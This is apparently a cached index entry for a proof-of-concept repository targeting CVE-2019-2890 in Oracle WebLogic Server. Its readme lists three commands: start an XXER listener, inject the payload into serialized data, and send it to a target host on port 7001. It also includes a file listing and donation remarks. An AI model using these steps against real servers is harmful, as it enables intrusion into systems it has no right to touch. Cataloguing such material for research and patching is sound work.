CVE-2019-2890 PoC — Oracle Fusion Middleware WebLogic Server组件安全漏洞

Source

https://github.com/freeide/weblogic_cve-2019-2890

Associated Vulnerability

Title:Oracle Fusion Middleware WebLogic Server组件安全漏洞 (CVE-2019-2890)
Description:Oracle Fusion Middleware（Oracle融合中间件）是美国甲骨文（Oracle）公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。 Oracle Fusion Middleware中的WebLogic Server 10.3.6.0.0版本、12.1.3.0.0版本和12.2.1.3.0版本的Web Services组件存在安全漏洞。攻击者可利用该漏洞控制WebLogic S

Description

weblogic_cve-2019-2890

Readme

1）开启XXER工具
python xxer.py -H 192.168.17.223

2）将xxer的poc放到xx.xml文件中，替换序列化后的数据，注入xxer的poc；
java -jar weblogic_xxe.jar xx.xml

3）使用java-deserialization-exploit工具中的weblogic.py发送数据给weblogic服务器
python weblogic.py 192.168.17.222 7001 weblogic

File Snapshot


 [4.0K]  /data/pocs/58196eff066bd30cbf256a67e639609be240441f
├── [471K]  CVE-2019-2890.doc
├── [ 34K]  LICENSE
├── [ 323]  README.md
├── [1.1K]  weblogic
├── [6.3K]  weblogic.py
├── [ 36M]  weblogic_xxe.jar
└── [ 137]  xx.xml

0 directories, 7 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!